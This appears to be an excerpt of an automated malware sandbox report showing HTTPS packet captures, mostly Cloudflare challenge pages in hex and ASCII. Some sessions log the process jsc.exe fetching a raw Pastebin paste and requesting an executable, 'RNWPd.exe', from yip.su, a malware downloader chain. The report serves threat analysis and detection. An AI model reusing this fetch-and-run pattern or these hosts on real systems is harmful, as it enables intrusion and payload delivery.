                                    Data Ascii: MDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODk
                                    2024-08-17 22:11:11 UTC1369INData Raw: 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30
                                    Data Ascii: em;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50
                                    2024-08-17 22:11:11 UTC1369INData Raw: 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61
                                    Data Ascii: st:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:0;pa
                                    2024-08-17 22:11:11 UTC1369INData Raw: 79 62 46 54 50 51 5f 30 5a 42 68 42 2e 79 50 58 4a 67 4d 65 41 6d 4b 50 59 2e 56 45 45 52 45 75 33 62 4f 73 52 33 44 5f 44 73 39 4d 41 36 50 71 56 6c 38 59 5f 4e 32 6d 42 4d 59 49 49 59 35 65 66 4e 37 42 47 38 44 4b 33 45 64 4a 69 57 48 68 53 76 33 41 74 73 53 67 6b 5f 67 46 71 48 57 59 6e 79 38 75 42 6c 51 47 34 31 30 72 37 4a 4b 68 45 4d 49 74 31 51 62 64 39 77 45 75 48 68 6d 61 4b 78 64 4b 30 33 63 37 4c 43 6e 54 59 44 2e 54 56 77 35 2e 50 48 54 75 57 51 4b 57 46 55 38 4c 4c 31 72 68 6d 47 46 51 61 51 32 6b 74 30 56 61 4a 4d 53 58 71 31 68 7a 4e 4b 75 41 63 56 37 56 48 6f 6a 6e 35 2e 78 70 47 50 37 68 69 64 36 7a 79 6a 52 6e 76 30 65 33 6f 63 52 57 4b 50 42 42 48 50 4b 77 36 54 6f 67 48 48 44 68 63 64 43 30 36 74 55 6a 6c 52 33 41 4b 31 78 52 78 47 48
                                    Data Ascii: ybFTPQ_0ZBhB.yPXJgMeAmKPY.VEEREu3bOsR3D_Ds9MA6PqVl8Y_N2mBMYIIY5efN7BG8DK3EdJiWHhSv3AtsSgk_gFqHWYny8uBlQG410r7JKhEMIt1Qbd9wEuHhmaKxdK03c7LCnTYD.TVw5.PHTuWQKWFU8LL1rhmGFQaQ2kt0VaJMSXq1hzNKuAcV7VHojn5.xpGP7hid6zyjRnv0e3ocRWKPBBHPKw6TogHHDhcdC06tUjlR3AK1xRxGH


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    65192.168.2.549792104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:16 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:16 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cffbd1b818ccd-EWR
                                    2024-08-17 22:11:16 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:16 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:16 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:16 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    66192.168.2.549793188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:17 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:17 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:17 UTC677INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6e 75 58 78 30 66 4f 67 63 6d 4a 32 36 37 49 42 51 74 4b 6b 57 74 62 32 43 30 31 75 4c 4d 37 59 72 61 69 2b 38 75 2b 54 6d 58 55 73 65 74 64 4e 54 51 37 79 74 65 44 7a 48 38 6e 74 77 35 46 45 51 44 57 4e 6d 35 47 36 47 2b 6c 63 55 70 76 42 56 39 42 71 6e 4b 35 64 38 35 61 45 66 37 56 72 51 62 6c 57 4d 4d 31 6f 53 38 41 3d 24 4e 41 55 66 64 37 78 6a 6f 4f 2b 72 35 68 48 4c 74 42 65 54 49 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: nuXx0fOgcmJ267IBQtKkWtb2C01uLM7Yrai+8u+TmXUsetdNTQ7yteDzH8ntw5FEQDWNm5G6G+lcUpvBV9BqnK5d85aEf7VrQblWMM1oS8A=$NAUfd7xjoO+r5hHLtBeTIw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:17 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:17 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:17 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:17 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:17 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:17 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:17 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:17 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 35 38 38 38 36 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 63 31 34 62 32 31 37 63 38 61 27 2c 63 48 61 73 68 3a 20 27 66 32 36 36 61 36 39 32 31 34 62 33 62 35 66 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 52 77 4c 4b 49 6c 71 31 58 66 4f 4b 69 6a 59 65 32 6f 34 6a 5f 78 69 4f 77 48 34 67 7a 73 56 30 46 74 59 71 50 66 45 67 62 79 49 2d 31 37 32 33 39 33 32 36 37 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '58886',cRay: '8b4cffc14b217c8a',cHash: 'f266a69214b3b5f',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=RwLKIlq1XfOKijYe2o4j_xiOwH4gzsV0FtYqPfEgbyI-1723932677-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:17 UTC1369INData Raw: 76 36 4e 56 39 57 56 6b 59 4c 61 6d 68 44 6a 41 35 34 5a 61 6f 4a 4d 6c 76 78 6a 77 75 4a 74 4d 38 56 4b 46 48 44 36 49 47 74 46 57 75 30 72 56 62 33 74 77 61 6b 31 47 61 77 5f 44 6a 76 2e 41 47 6b 2e 62 5f 31 77 50 79 48 51 6d 79 62 56 46 38 36 77 74 44 70 6d 37 42 39 77 6b 36 39 6c 74 74 35 76 42 6c 66 33 41 31 32 59 58 76 47 6f 59 59 4b 30 6b 62 79 64 35 71 6c 2e 76 6c 47 5f 6c 63 73 53 5f 4c 52 4f 51 53 57 55 61 34 54 2e 67 39 4a 4d 46 5a 31 67 62 4c 4e 4d 54 45 62 61 52 48 36 6a 6a 69 45 6e 6b 38 32 31 71 42 75 46 48 73 4b 6f 59 78 6c 37 42 71 61 66 6e 62 61 31 66 4e 6b 31 47 53 42 35 59 45 54 6d 38 6d 4f 6c 70 6a 72 2e 41 58 4d 72 59 72 36 41 35 42 41 41 4c 32 73 4d 6d 44 63 68 52 45 68 59 76 57 75 6c 62 38 4c 45 74 78 36 36 46 51 35 57 55 58 55 73
